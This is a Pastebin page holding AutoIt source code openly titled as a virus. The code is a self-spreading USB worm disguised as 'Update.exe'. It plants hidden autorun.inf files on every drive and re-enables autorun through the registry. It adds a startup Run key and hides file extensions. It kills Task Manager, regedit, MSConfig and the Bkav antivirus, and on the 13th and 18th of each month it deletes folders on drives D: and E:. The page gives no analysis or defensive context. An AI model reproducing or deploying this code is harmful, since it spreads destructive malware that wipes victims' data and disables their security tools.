Advertisement
Zeroooooo

code virus autoit ver 1.0.0

Oct 25th, 2014
239
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 3.84 KB | None | 0 0
  1. #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
  2. #AutoIt3Wrapper_Icon=..\Downloads\3xhumed-Mega-Games-Pack-36-League-of-Legends-6.ico
  3. #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
  4. Opt("TrayIconHide", 1)
  5. $var4 = @ScriptDir
  6. If $var4 <> "C:\WINDOWS" Then
  7. ; FileCreateShortcut(@WindowsDir & "\Explorer.exe",@DesktopDir & "\1.lnk","",@ScriptDir, "","", "^!t", "", @SW_SHOWMAXIMIZED)
  8. FileCreateShortcut(@WindowsDir & "\Explorer.exe","",@ScriptDir, "","", "^!t", "", @SW_SHOWMAXIMIZED)
  9. Send("^!t")
  10. EndIf
  11. $list = ProcessList("Update.exe")
  12. for $i = 1 to $list[0][0]
  13. If $i="2" Then
  14. Exit
  15. EndIf
  16. next
  17. FileSetAttrib("autorun.inf", "-R")
  18. FileDelete("autorun.inf")
  19. $file2 = FileOpen("autorun.inf", 1)
  20. FileWriteLine($file2, "[AutoRun]")
  21. FileWriteLine($file2, "open=Update.exe")
  22. FileWriteLine($file2, "shell\Open=Open")
  23. FileWriteLine($file2, "shell\Open\Command=Update.exe")
  24. FileWriteLine($file2, "shellexecute=Update.exe")
  25. FileClose($file2)
  26. FileSetAttrib("autorun.inf", "+HSR")
  27. FileSetAttrib(@DesktopDir & "\1.lnk", "+HS")
  28. FileCopy(@ScriptDir & "\autorun.inf", "C:\", 8)
  29. FileCopy(@ScriptDir & "\Update.exe", "C:\", 8)
  30. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDriveAutoRun", "REG_DWORD", "000000000")
  31. RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoDriveAutoRun", "REG_DWORD", "000000000")
  32. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "DisableLocalMachineRun", "REG_DWORD", "000000000")
  33. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "DisableCurrentUserRun", "REG_DWORD", "000000000")
  34. RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "DisableLocalMachineRun", "REG_DWORD", "000000000")
  35. RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "DisableCurrentUserRun", "REG_DWORD", "000000000")
  36. $search = FileFindFirstFile("D:\*.*")
  37. $search0 = FileFindFirstFile("E:\*.*")
  38. $bLoop = 1
  39. While $bLoop = 1
  40. $file = FileFindNextFile($search)
  41. $file0 = FileFindNextFile($search0)
  42.  
  43. If @MDAY = "13" Or @MDAY = "18" Then
  44. DirRemove("D:\" & $file, 1)
  45. DirRemove("E:\" & $file0, 1)
  46. Else
  47. $var = DriveGetDrive("all")
  48. For $i = 1 to $var[0]
  49. If $var[$i] = "a:" or $var[$i] = "b:" Then
  50. For $i = 2 to $var[0]
  51. $file = FileOpen($var[$i] & "\autorun.inf", 0)
  52. $line = FileReadLine($file, 2)
  53. FileClose($file)
  54. If $line <> "open=Update.exe" Then
  55. FileSetAttrib($var[$i] & "\autorun.inf", "-R")
  56. FileCopy(@ScriptDir & "\autorun.inf", $var[$i], 1)
  57. FileCopy(@ScriptDir & "\Update.exe", $var[$i], 8)
  58. EndIf
  59. Next
  60. Else
  61. $file = FileOpen($var[$i] & "\autorun.inf", 0)
  62. $line = FileReadLine($file, 2)
  63. FileClose($file)
  64. If $line <> "open=Update.exe" Then
  65. FileSetAttrib($var[$i] & "\autorun.inf", "-R")
  66. FileCopy(@ScriptDir & "\autorun.inf", $var[$i], 1)
  67. FileCopy(@ScriptDir & "\Update.exe", $var[$i], 8)
  68. EndIf
  69. EndIf
  70. Next
  71. EndIf
  72. FileCopy(@ScriptDir & "\Update.exe", @WindowsDir, 8)
  73. FileCopy(@ScriptDir & "\autorun.inf", @WindowsDir, 1)
  74. ProcessClose("MSConfig.exe")
  75. $PID3 = ProcessExists("MSConfig.exe")
  76. If $PID3 Then ProcessClose($PID3)
  77. ProcessClose("regedit.exe")
  78. $PID2 = ProcessExists("regedit.exe")
  79. If $PID2 Then ProcessClose($PID2)
  80. ProcessClose("taskmgr.exe")
  81. $PID1 = ProcessExists("taskmgr.exe")
  82. If $PID1 Then ProcessClose($PID1)
  83. ProcessClose("Bkav2006.exe")
  84. $PID4 = ProcessExists("Bkav2006.exe")
  85. If $PID4 Then ProcessClose($PID4)
  86. RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "HUI", "REG_SZ", "C:\windows\Update.exe")
  87. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "HideFileExt", "REG_DWORD", "000000001")
  88. RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "ShowSuperHidden", "REG_DWORD", "000000000")
  89. WEnd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement